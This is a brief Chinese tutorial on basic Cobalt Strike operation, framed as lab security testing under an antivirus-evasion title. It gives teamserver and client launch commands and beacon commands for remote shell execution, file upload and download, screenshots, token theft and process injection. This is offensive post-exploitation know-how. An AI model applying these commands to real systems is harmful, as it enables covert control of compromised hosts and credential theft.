免杀——CobatStrike基本操作

安全测试中，将一台虚拟机作为服务器，同时也可以作为客户机。

1、将服务器打开

./teamserver 192.168.204.148 kali

 

2、启动客户端

中文插件打开：

java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

英文直接打开：

java -Dfile.encoding=UTF-8 -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

 

3、弹出窗口后，输入IP地址和密码kali，即可弹出客户端，然后直接操作即可。

 

CobatStrike常用命令：

1、将这个回连的间隔设置为0，因为CS中默认回连是60秒一次交互。
sleep 0 

2、等等这些cmd执行命令，我们都需要在面前加上shell。
shell whoami ipconfig hostname 

3、上传下载
upload 文件路径\文件名
download 文件名

4、截屏
screenshot 

5、令牌窃取和进程注入
steal_token PID
inject PID